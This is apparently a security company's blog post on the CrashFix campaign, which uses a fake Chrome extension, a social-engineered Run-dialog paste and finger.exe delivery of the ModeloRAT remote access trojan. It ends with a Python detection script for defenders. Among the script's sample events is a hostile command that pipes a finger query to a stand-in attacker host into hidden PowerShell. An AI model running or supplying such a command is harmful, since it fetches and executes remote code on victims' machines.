KongTuke (a.k.a. TAG 124), a traffic distribution service (TDS) with a long history of distributing ransomware and loader malware, is behind this campaign, which deploys a new remote access trojan (RAT) known as ModeloRAT and focuses primarily on businesses.
The attack starts with malicious ads related to ad blockers. Users who search for an ad blocker are redirected to the official Chrome Web Store, where they find a fake extension entitled “NexShield – Advanced Web Guardian”.
1. It appears to be an exact duplicate of the uBlock Origin Lite extension
2. It waits 60 minutes before activating, to avoid detection
3. It sends a unique victim ID to KongTuke
4. It carries out hostile actions every 10 minutes
The CrashFix Trick
Once activated, the extension creates a denial-of-service (DoS) loop that exhausts Chrome's memory, making the browser unresponsive and eventually crashing it.
When the user restarts the browser, a fake security warning appears, informing them that the browser suffered an unexpected shutdown. The warning directs the user:
1. To open the Windows "Run" command,
2. To copy the command shown in the warning,
3. To run it to "normalize" the situation.
This social-engineering step takes the place of a software exploit.
The Delivery and Execution of the Payload
Once the user pastes that command, it runs finger.exe (a legitimate Windows utility) to request a PowerShell payload from an attacker-controlled server.
The delivery chain includes:
1. Dual-layered Base64 and XOR obfuscation
2. Anti-analysis checks for debuggers, sandboxes and virtual machines on the host
3. Host checks to determine whether the host is domain-joined or standalone
The final payload, ModeloRAT, is only delivered to domain-joined hosts.
What Is ModeloRAT?
ModeloRAT is a feature-rich remote access tool (RAT) for Microsoft Windows, written in Python. It is designed to operate stealthily while maintaining persistence.
ModeloRAT offers the following features:
1. Encrypted command-and-control (C2) communications using RC4
2. Persistence via registry entries
3. The ability to run:
a. Executable files (.EXE)
b. Dynamic link libraries (.DLL)
c. PowerShell commands
d. Python code
4. Automatic randomization of beacons based on unique device and frequency settings
5. Self-updating and self-termination functionality
The RAT's behaviour indicates that it is used post-exploitation, typically leading to the deployment of ransomware.
Implications for Businesses
This campaign illustrates several modern risks:
1. Trust placed in platforms like the Chrome Web Store for content
2. Security products often overlook browser extensions
3. User frustration is now used as a vector for exploitation
4. Corporate environments are often specifically targeted
The RAT delivered by KongTuke provides access to ransomware gangs, so detecting it early is very important.
Defensive Recommendations
1. Enforce policies that restrict the installation of browser extensions.
2. Establish monitoring to track abnormal browser crashes.
3. Prevent misuse of native Windows tools such as finger.exe and powershell.exe through policy and technical controls.
4. Educate users that legitimate fixes for security problems never require pasting command strings into the command prompt.
5. Track and alert on clipboard-based execution patterns.
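As an added example (not from the original article or the cited source), the following Python shows how recommendations 3 and 5 above can be turned into detection logic: it runs heuristic rules for the Run-dialog, finger.exe and PowerShell chain over constructed process-creation events. Field names, the sample command lines and the host attacker.example are all assumptions made for the example.

```python
# Added example: heuristic detection of the Run-dialog -> finger.exe -> PowerShell
# delivery chain. Events are constructed for this example; the fields mirror the
# shape of typical EDR/Sysmon process-creation records (an assumption).
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    ts: float          # seconds since epoch (constructed)
    pid: int
    ppid: int
    image: str         # lower-case image basename of the new process
    parent_image: str  # lower-case image basename of the parent
    cmdline: str


def detect_crashfix_chain(events):
    """Return (rule, pid) findings for events matching the CrashFix delivery pattern."""
    findings = []
    for e in events:
        cl = e.cmdline.lower()
        # 1. finger.exe querying a remote host: rarely legitimate on business endpoints
        if e.image == "finger.exe" and "@" in cl:
            findings.append(("finger_remote_query", e.pid))
        # 2. explorer.exe directly launching a shell: something typed or pasted into Run
        if e.parent_image == "explorer.exe" and e.image in ("cmd.exe", "powershell.exe"):
            findings.append(("run_dialog_shell", e.pid))
        # 3. PowerShell started by the same parent within 10 s of finger.exe: payload handoff
        if e.image == "powershell.exe":
            if any(s.ppid == e.ppid and s.image == "finger.exe" and 0 <= e.ts - s.ts <= 10
                   for s in events):
                findings.append(("finger_to_powershell_chain", e.pid))
        # 4. encoded or hidden-window PowerShell invocations
        if e.image == "powershell.exe" and re.search(
                r"(^|\s)-(e|enc|encodedcommand)\b|-w(indowstyle)?\s+hidden", cl):
            findings.append(("encoded_or_hidden_powershell", e.pid))
    return findings


# Constructed sample events: one pasted-command chain plus one benign scheduled script.
SAMPLE_EVENTS = [
    ProcEvent(100.0, 4001, 1200, "cmd.exe", "explorer.exe",
              "cmd.exe /c finger user@attacker.example | powershell -w hidden -"),
    ProcEvent(100.2, 4002, 4001, "finger.exe", "cmd.exe", "finger user@attacker.example"),
    ProcEvent(100.3, 4003, 4001, "powershell.exe", "cmd.exe", "powershell -w hidden -"),
    ProcEvent(200.0, 5001, 900, "powershell.exe", "svchost.exe",
              "powershell -File C:\\ops\\inventory.ps1"),
]

if __name__ == "__main__":
    for rule, pid in detect_crashfix_chain(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Rule 1 alone already covers the page's key indicator (finger.exe fetching a remote payload); rules 2 to 4 add the surrounding context so a single alert carries the whole chain.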
Key Takeaway
CrashFix demonstrates that attackers no longer need to exploit traditional software vulnerabilities to succeed; instead they exploit users' trust, convenience and frustration to build the workflow in which the attack takes place.
Source: The Hacker News
© 2016 - 2026 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067